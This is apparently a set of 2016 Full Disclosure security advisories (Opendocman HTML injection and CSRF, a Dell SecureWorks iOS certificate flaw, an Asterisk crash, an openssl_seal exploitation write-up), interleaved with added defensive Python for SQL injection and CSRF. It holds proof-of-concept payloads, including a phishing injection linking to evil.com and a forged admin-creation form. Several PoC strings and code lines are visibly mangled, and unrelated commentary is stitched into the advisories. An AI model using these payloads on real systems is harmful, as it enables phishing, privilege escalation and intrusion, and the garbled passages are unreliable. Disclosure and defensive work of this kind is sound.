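        "UPDATE settings SET value = ? WHERE name = 'country_blacklist'",
        (country_blacklist,),
    )
    conn.commit()


def get_setting(conn: sqlite3.Connection, name: str) -> str:
    row = conn.execute("SELECT value FROM settings WHERE name = ?", (name,)).fetchone()
    return row[0]


if __name__ == "__main__":
    a = make_settings_db()
    vulnerable_update(a, PAYLOAD)
    print("concatenated :", get_setting(a, "country_blacklist"), "|", get_setting(a, "admin_password_hash"))
    b = make_settings_db()
    safe_update(b, PAYLOAD)
    print("parameterised:", get_setting(b, "country_blacklist"), "|", get_setting(b, "admin_password_hash"))
```

With the bound parameter the payload ends up stored verbatim as the blacklist string and nothing else changes, which is the behaviour the advisory's "install vendor patch" is asking for.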

[FD] Opendocman 1.3.4: HTML Injection

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Opendocman 1.3.4
Fixed in:            1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:      http://www.opendocman.com/
Vulnerability Type:  HTML Injection
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

To defend against XSS and similar attacks, opendocman depends on a function
that filters all input to remove dangerous tags and attributes.

The filter does filter out all simple approaches to XSS, but it still leaves an
attacker with large control over the look and functionality of the website.
This can lead to phishing attacks, privilege escalation, defacement, and may
lead to XSS with older browsers.

There are likely other possibilities for attackers. It is recommended to
HTML-encode user input before echoing it to mitigate these issues, instead of
relying on input filtering.

These issues are present across the application and are reflected as well as
persistent, for example via the profile or comments.

3. Proof of Concept

Privilege Escalation

A registered user can exploit this issue in combination with social engineering
to gain admin rights:

- Change any profile field, such as last name, to: 
Smith">http://localhost/opendocman-1.3.4/search.php/;>

Phishing & Defacement

Attacker-controlled elements can be shown in places where a user would only
expect application-controlled data, not user data, which can be used in
phishing attacks or to deface the website.

A simple example would be:

http://localhost/opendocman-1.3.4/search.php/;>http://evil.com; style= 
"background: red; color: white">Security Alert: Please upgrade to the latest 
version here!http://localhost/opendocman-1.3.4/add.php
The same is possible when updating a user profile here:
http://localhost/opendocman-1.3.4//profile.php
It should be noted that by default, the registration is not open, but there is
an option to open registration for anyone.

4. Code

The problem exists across the application. A quick search reveals at least
these code snippets which are likely open to reflected attacks. Further
parameters are likely vulnerable as well. Additionally, all user input that is
persisted seems to be affected as well.

check-out.php:';
category.php:
rejects.php:echo '';
rejects.php:echo '';
search.php:

5. Solution

To mitigate this issue please upgrade at least to version 1.3.5:

http://www.opendocman.com/free-download/

Please note that a newer version might already be available.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for different issue for verification
01/13/2016 Confirmed fix
01/20/2016 Vendor requests more time to fix XSS issues
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany



[FD] Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability

2016-02-03 Thread David Coomber
Dell SecureWorks iOS Application - MITM SSL Certificate Vulnerability
--
http://www.info-sec.ca/advisories/Dell-SecureWorks.html

Overview

"Access your critical Dell SecureWorks security information on the go."

"With the Dell SecureWorks Mobile App you can:

* Quickly respond to security incidents on your mobile device
* Review/update/create tickets for your critical security events
* Contact the Dell SecureWorks Secure Operations Centers 24/7/365
* Get the latest threat intelligence from our award winning Counter
Threat Intelligence (CTU) team"

(https://itunes.apple.com/us/app/dell-secureworks/id533072046)

Issue

The Dell SecureWorks iOS application (version 2.0.6 and below) does
not validate the SSL certificate it receives when connecting to a
secure site.

Impact

An attacker who can perform a man in the middle attack may present a
bogus SSL certificate which the application will accept silently.
Usernames, passwords and sensitive information could be captured by an
attacker without the user's knowledge.

Timeline

October 4, 2015 - Notified Dell SecureWorks via
secur...@secureworks.com & secur...@dell.com
October 6, 2015 - Dell SecureWorks responded stating that they are investigating
October 15, 2015 - Dell SecureWorks asked for steps to reproduce the
vulnerability
October 15, 2015 - Provided steps to reproduce
October 22, 2015 - Dell SecureWorks confirmed the vulnerability
October 22, 2015 - Asked for a timeline to release the new version
October 26, 2015 - Dell SecureWorks responded stating they are working
on an update but do not have a timeline
February 2, 2016 - Dell SecureWorks released version 2.1 which
resolves this vulnerability

Solution

Upgrade to version 2.1 or later



[FD] CALL FOR PAPERS - FAQin Congress - Madrid

2016-02-03 Thread Esteban Dauksis
The FAQin Association is proud to announce the call for [ papers,
presentations, proposals ] at FAQin congress

-=] About FAQin Congress

FAQin congress is a free invitation-only underground hacking event in
Madrid, Spain at We Rock venue from 5th to 6th of March. No press, no
cops... Just you, your peers and a bunch of free beer. Think about it.

Attendance is free, attendees must pass a CTF-like challenge to get a
ticket. Full details at www.faqin.org

-=] We are looking for offensive focused content:

 - Reverse engineering [ Hardware, Software, Protocol... ]
 - Writing and using exploits
 - Bypassing protections
 - Attacks on cryptography
 - Or any kind of offensive hacking

-=] Guidelines:

 - 45 minute slots, if you need double slot let us know.
 - We are open to proposals for workshops, demos, live hacks...


Please send an abstract, bio and "mugshot" to c...@faqin.org before 15th of
February.




Questions? Free tickets?  i...@faqin.org



[FD] AST-2016-003: Remote crash vulnerability when receiving UDPTL FAX data.

2016-02-03 Thread Asterisk Security Team
Asterisk Project Security Advisory - AST-2016-003

Product:            Asterisk
Summary:            Remote crash vulnerability when receiving UDPTL FAX data.
Nature of Advisory: Denial of Service
Susceptibility:     Remote Authenticated Sessions
Severity:           Minor
Exploits Known:     Yes
Reported On:        December 2, 2015
Reported By:        Walter Dokes, Torrey Searle
Posted On:          February 3, 2016
Last Updated On:    February 3, 2016
Advisory Contact:   Richard Mudgett
CVE Name:           Pending

Description: If no UDPTL packets are lost there is no problem. However,
a lost packet causes Asterisk to use the available error correcting
redundancy packets. If those redundancy packets have zero length then
Asterisk uses an uninitialized buffer pointer and length value which can
cause invalid memory accesses later when the packet is copied.

Resolution: Upgrade to a released version with the fix incorporated or
apply patch.

Affected Versions
Product                 Release Series
Asterisk Open Source    1.8.x           All versions
Asterisk Open Source    11.x            All versions
Asterisk Open Source    12.x            All versions
Asterisk Open Source    13.x            All versions
Certified Asterisk      1.8.28          All versions
Certified Asterisk      11.6            All versions
Certified Asterisk      13.1            All versions

Corrected In
Product                 Release
Asterisk Open Source    11.21.1, 13.7.1
Certified Asterisk      11.6-cert12, 13.1-cert3

Patches
SVN URL                                                              Revision
http://downloads.asterisk.org/pub/security/AST-2016-003-1.8.28.diff  Certified Asterisk 1.8.28
http://downloads.asterisk.org/pub/security/AST-2016-003-11.6.diff    Certified Asterisk 11.6
http://downloads.asterisk.org/pub/security/AST-2016-003-13.1.diff    Certified Asterisk 13.1
http://downloads.asterisk.org/pub/security/AST-2016-003-1.8.diff     Asterisk 1.8
http://downloads.asterisk.org/pub/security/AST-2016-003-11.diff      Asterisk 11
http://downloads.asterisk.org/pub/security/AST-2016-003-12.diff      Asterisk 12
http://downloads.asterisk.org/pub/security/AST-2016-003-13.diff      Asterisk 13

Links  https://issues.asterisk.org/jira/browse/ASTERISK-25603 

Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security  
  
This document may be superseded by later versions; if so, the latest  
version will be posted at 
http://downloads.digium.com/pub/security/AST-2016-003.pdf and 
http://downloads.digium.com/pub/security/AST-2016-003.html

Revision History
  Date  

[FD] Opendocman 1.3.4: CSRF

2016-02-03 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Opendocman 1.3.4
Fixed in:            1.3.5
Fixed Version Link:  http://www.opendocman.com/free-download/
Vendor Website:      http://www.opendocman.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 02/01/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

Opendocman does not have CSRF protection, which means that an attacker can
perform actions for an admin, if the admin visits an attacker controlled
website while logged in.

3. Proof of Concept

Add new Admin User:


  
<form action="http://localhost/opendocman-1.3.4/user.php" method="POST"
enctype="multipart/form-data">
  [...]
</form>



4. Solution

To mitigate this issue please upgrade at least to version 1.3.5:

http://www.opendocman.com/free-download/

Please note that a newer version might already be available.

5. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

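The CSRF PoC above works because user.php accepts any POST that carries the admin's cookie, with nothing in the request that only the application's own page could have produced. As an added example (my code, not Opendocman's), the helpers below implement the usual fix: a per-session synchronizer token embedded in the form and compared in constant time on every state-changing request, with an Origin/Referer check as a second layer. `APP_ORIGIN` and the `/user.php` form fields are assumptions for the example.

```python
import hmac
import secrets
from typing import Dict, Mapping
from urllib.parse import urlsplit

APP_ORIGIN = "https://docs.example"  # assumed origin of the application


def issue_csrf_token(session: Dict[str, str]) -> str:
    """One unguessable token per session, kept server-side and reused
    until the session ends (so multiple tabs keep working)."""
    token = session.get("csrf_token")
    if not token:
        token = secrets.token_urlsafe(32)
        session["csrf_token"] = token
    return token


def render_add_user_form(session: Dict[str, str]) -> str:
    """The legitimate form carries the token; an attacker's page cannot read it."""
    token = issue_csrf_token(session)
    return (
        '<form action="/user.php" method="POST">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input type="text" name="username">\n'
        '  <input type="submit" value="Add user">\n'
        '</form>'
    )


def _same_origin(headers: Mapping[str, str]) -> bool:
    """Defence in depth: Origin (or, failing that, Referer) must be our own
    origin. A state-changing request with neither header is refused."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    s, a = urlsplit(src), urlsplit(APP_ORIGIN)
    return (s.scheme, s.netloc) == (a.scheme, a.netloc)


def verify_state_changing_request(session: Dict[str, str], form: Mapping[str, str],
                                  headers: Mapping[str, str]) -> bool:
    """Accept the request only if the form token matches the session token."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not supplied:
        return False
    if not hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8")):
        return False
    return _same_origin(headers)


if __name__ == "__main__":
    sess: Dict[str, str] = {}
    print(render_add_user_form(sess))
    forged = {"username": "evil", "admin": "1"}
    print("forged accepted:", verify_state_changing_request(sess, forged, {"Origin": "https://attacker.example"}))
```

Setting the session cookie with `SameSite=Lax` or `Strict` removes most cross-site POSTs before they reach this code, but the token check is the part that does not depend on browser behaviour.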


[FD] A tale of openssl_seal(), PHP and Apache2handle

2016-02-03 Thread s3810
Hey folks,

openssl_seal() [4] is prone to using uninitialized memory, which can be
turned into code execution. This document describes the technical details of
our journey to hijack apache2 requests.

What the heck is openssl_seal()?

[...]
int openssl_seal ( string $data , string &$sealed_data , array &$env_keys ,
                   array $pub_key_ids [, string $method = "RC4" ] )

openssl_seal() seals (encrypts) data by using the given method with a
randomly generated secret key.  The key is encrypted with each of the
public keys associated with the identifiers in pub_key_ids and each
encrypted key is returned in env_keys. This means that one can send sealed
data to multiple recipients (provided one has obtained their public keys).
Each recipient must receive both the sealed data and the envelope key that
was encrypted with the recipient's public key.
[...]

Source: PHP documentation  [4]
But it doesn't matter that much what it's intended to do, let's see its
implementation.

The Bug

4888 /* {{{ proto int openssl_seal(string data, &sealdata, &ekeys, array pubkeys)
4889    Seals data */
4890 PHP_FUNCTION(openssl_seal)
4891 {
4892     zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL;
4893     HashTable *pubkeysht;
4894     EVP_PKEY **pkeys;
[...]
4895     zend_resource ** key_resources; /* so we know what to cleanup */
4905     if (zend_parse_parameters(ZEND_NUM_ARGS(), "sz/z/a/|sz/", &data, &data_len,
4906             &sealdata, &ekeys, &pubkeys, &method, &method_len, &iv) == FAILURE) {
4907         return;
4908     }
4909     pubkeysht = Z_ARRVAL_P(pubkeys);
4910     nkeys = pubkeysht ? zend_hash_num_elements(pubkeysht) : 0;
4911     if (!nkeys) {
4912         php_error_docref(NULL, E_WARNING, "Fourth argument to openssl_seal() must be a non-empty array");
4913         RETURN_FALSE;
4914     }
[...]
4935     pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0);
[...]
4939     key_resources = safe_emalloc(nkeys, sizeof(zend_resource*), 0);
4940     memset(key_resources, 0, sizeof(zend_resource*) * nkeys);
4941
4942     /* get the public keys we are using to seal this data */
4943     i = 0;
4944     ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) {
4945         pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, &key_resources[i]);
4946         if (pkeys[i] == NULL) {
4947             php_error_docref(NULL, E_WARNING, "not a public key (%dth member of pubkeys)", i+1);
4948             RETVAL_FALSE;
4949             goto clean_exit;
4950         }
4951         eks[i] = emalloc(EVP_PKEY_size(pkeys[i]) + 1);
4952         i++;
4953     } ZEND_HASH_FOREACH_END();
[...]
5000 clean_exit:
5001for (i=0; ireferences, -1, CRYPTO_LOCK_EVP_PKEY);
[...]
387 if (i > 0)
388 return;
[...]
395 EVP_PKEY_free_it(x);
396 if (x->attributes)
397 sk_X509_ATTRIBUTE_pop_free(x->attributes, X509_ATTRIBUTE_free);
398 OPENSSL_free(x);
399 }

Source: 
http://nxr.netbsd.org/xref/src/crypto/external/bsd/openssl/dist/crypto/evp/p_lib.c#376

Thanks to the x == NULL check it wasn't found by unit tests. One obvious way
to exploit this bug is to trigger a double free and then try to mess
something up, but OpenSSL uses the allocator from libc, which usually deals
with double free pretty well. There's an option to manipulate memory via
CRYPTO_add (as we control x), but decreasing by 1 will not get us far.
Let's dig deeper and see the EVP_PKEY_free_it() implementation:

401 static void EVP_PKEY_free_it(EVP_PKEY *x)
402 {
403 if (x->ameth && x->ameth->pkey_free) {
404 x->ameth->pkey_free(x);
405 x->pkey.ptr = NULL;
406 }
[...]

Source: